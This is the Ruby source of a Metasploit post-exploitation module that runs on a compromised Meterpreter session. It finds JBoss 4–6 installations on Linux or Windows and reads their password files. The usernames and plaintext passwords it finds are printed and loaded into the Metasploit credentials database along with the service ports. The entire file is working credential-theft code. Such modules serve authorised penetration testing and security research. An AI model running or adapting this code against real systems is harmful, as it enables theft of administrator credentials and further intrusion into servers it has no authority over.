require 'nokogiri' class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System def initialize(info = {}) super(update_info( info, 'Name' => 'Jboss Credential Collector', 'Description' => %q( This module can be used to extract the Jboss admin passwords for version 4,5 and 6. ), 'License' => MSF_LICENSE, 'Author' => [ 'Koen Riepe (' ], 'Platform' => [ 'linux', 'win' ], 'SessionTypes' => [ 'meterpreter' ] ) ) end def report_creds(user, pass, port) return if (user.empty? or pass.empty?) # Assemble data about the credential objects we will be creating credential_data = { origin_type: :session, post_reference_name: self.fullname, private_data: pass, private_type: :password, session_id: session_db_id, username: user, workspace_id: myworkspace_id } credential_core = create_credential(credential_data) if not port.is_a? Integer print_status('Failed to detect port, defaulting to 8080 for creds database') port = 8080 end login_data = { core: credential_core, status: Metasploit::Model::Login::Status::UNTRIED, address: ::Rex::Socket.getaddress(session.sock.peerhost, true), port: port, service_name: 'jboss', protocol: 'tcp', workspace_id: myworkspace_id } create_credential_login(login_data) end def getpw(file, ports) i = 0 file.each do |pwfile| begin print_status("Getting passwords from: #{pwfile}") lines = read_file(pwfile).split("\n") rescue print_error("Cannot open #{pwfile}, you probably do not have permissions to open the file.") next end for line in lines if not line.include? "#" creds = line.split("=") print_good("Credentials found - Username: #{creds[0]} Password: #{creds[1]}") report_creds(creds[0], creds[1], ports[i]) end end i += 1 end end def getversion(array) i = 0 version = "NONE" results = [] while i < array.count downcase = array[i].downcase if downcase.include? "jboss" begin file = read_file(array[i]) rescue print_error("Cannot open #{array[i]}, you probably do not have permissions to open the file.") next end xml_doc = Nokogiri::XML(file) xml_doc.xpath("//jar-versions//jar").each do |node| if node["name"] == "jbossweb.jar" version = node["specVersion"][0] results.push(version) end end end if not version == "NONE" print_status("Found a Jboss installation version: #{version}") home = readhome(cmd_exec('printenv').split("\n")) pwfiles = getpwfiles(cmd_exec('locate').split("\n"), home, version) listenports = getports(version) getpw(pwfiles,listenports) end i+=1 end end def wingetversion(array, home) i = 0 version = "NONE" results = [] while i < array.count downcase = array[i].downcase if downcase.include? "jboss" file = read_file(array[i]) xml_doc = Nokogiri::XML(file) xml_doc.xpath("//jar-versions//jar").each do |node| if node["name"] == "jbossweb.jar" version = node["specVersion"][0] results.push(version) end end end if not version == "NONE" print_status("Found a Jboss installation version: #{version}") instances = wingetinstances(home, version) pwfiles = winpwfiles(instances) listenports = wingetport(instances) getpw(pwfiles, listenports) end i += 1 end end def readhome(array) home = "" array.each do |item| if item.include? "JBOSS_HOME" home = item.split("JBOSS_HOME=")[1] end end return home end def getpwfiles(array, home, version) pwfiles = [] array.each do |location| if location.include? (home and version) pwfiles.push(location) end end return pwfiles end def getports(version) type1 = cmd_exec('locate bindings-jboss-beans.xml').split("\n") type2 = cmd_exec('locate jboss-web.deployer/server.xml').split("\n") port = [] type1.each do |file1| if file1 and file1.include? version print_status("Attempting to extract Jboss service ports from: #{file1}") begin file1_read = read_file(file1).split("\n") rescue print_error("Cannot open #{file1}, you probably do not have permissions to open the file.") next end parse = false portfound = false file1_read.each do |line| if line.strip.include? 'deploy/httpha-invoker.sar' parse = true elsif (line.strip == '' and portfound) parse = false elsif parse and line.include? '' portnr = line.split('')[1].split('<')[0].to_i port.push(portnr) portfound = true print_good("Jboss port found: #{portnr}") end end end end type2.each do |file2| if file2 and file2.include? version print_status("Attempting to extract Jboss service ports from: #{file2}") begin xml2 = Nokogiri::XML(read_file(file2)) rescue print_error("Cannot open #{file2}, you probably do not have permissions to open the file.") next end xml2.xpath("//Server//Connector").each do |connector| if connector['protocol'].include? "HTTP" portnr = connector['port'].to_i port.push(portnr) print_good("Jboss port found: #{portnr}") break end end end end return port end def gathernix print_status('Unix OS detected, attempting to locate Jboss services') version = getversion(cmd_exec('locate jar-versions.xml').split("\n")) end def winhome home = [] exec = cmd_exec('WMIC PROCESS get Caption,Commandline').split("\n") exec.each do |line| if line.downcase.include? "java.exe" and line.downcase.include? "jboss" print_status('Jboss service found') parse = line.split('-classpath "')[1].split("\\bin\\")[0] if parse[0] == ';' home.push(parse.split(';')[1]) else home.push(parse) end end end return home end def wingetinstances(home, version) instances = [] instance_location = "#{home}\\server" exec = cmd_exec("cmd /c dir #{instance_location}").split("\n") exec.each do |instance| if instance.split("")[1] if (not instance.split("")[1].strip.include? ".") and (not instance.split("")[1].strip.include? "..") instance_path = "#{home}\\server\\#{(instance.split('')[1].strip)}" if instance_path.include? version instances.push(instance_path) end end end end return instances end def winpwfiles(instances) files = [] instances.each do |seed| file_path = "#{seed}\\conf\\props\\" if exist?(file_path) files.push(file_path) end end return files end def wingetport(instances) port = [] instances.each do |seed| path1 = "#{seed}\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml" path2 = "#{seed}\\deploy\\jboss-web.deployer\\server.xml" if exist?(path1) file1 = read_file("#{seed}\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml").split("\n") end if exist?(path2) file2 = read_file("#{seed}\\deploy\\jboss-web.deployer\\server.xml") end if file1 print_status("Attempting to extract Jboss service ports from: #{seed}\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml") parse = false portfound = false file1.each do |line| if line.strip.include? 'deploy/httpha-invoker.sar' parse = true elsif (line.strip == '' and portfound) parse = false elsif parse and line.include? '' portnr = line.split('')[1].split('<')[0].to_i port.push(portnr) portfound = true print_good("Jboss port found: #{portnr}") end end end if file2 print_status("Attempting to extract Jboss service ports from: #{seed}\\deploy\\jboss-web.deployer\\server.xml") xml2 = Nokogiri::XML(file2) xml2.xpath("//Server//Connector").each do |connector| if connector['protocol'].include? "HTTP" portnr = connector['port'].to_i port.push(portnr) print_good("Jboss port found: #{portnr}") break end end end end return port end def gatherwin print_status('Windows OS detected, enumerating services') homeArray = winhome if homeArray.size > 0 homeArray.each do |home| version_file = [] version_file.push("#{home}\\jar-versions.xml") version = wingetversion(version_file, home) end else print_status('No Jboss service has been found') end end def run begin if sysinfo['OS'].include? "Windows" gatherwin else gathernix end rescue print_error('sysinfo function not available, you are probably using a wrong meterpreter.') end end end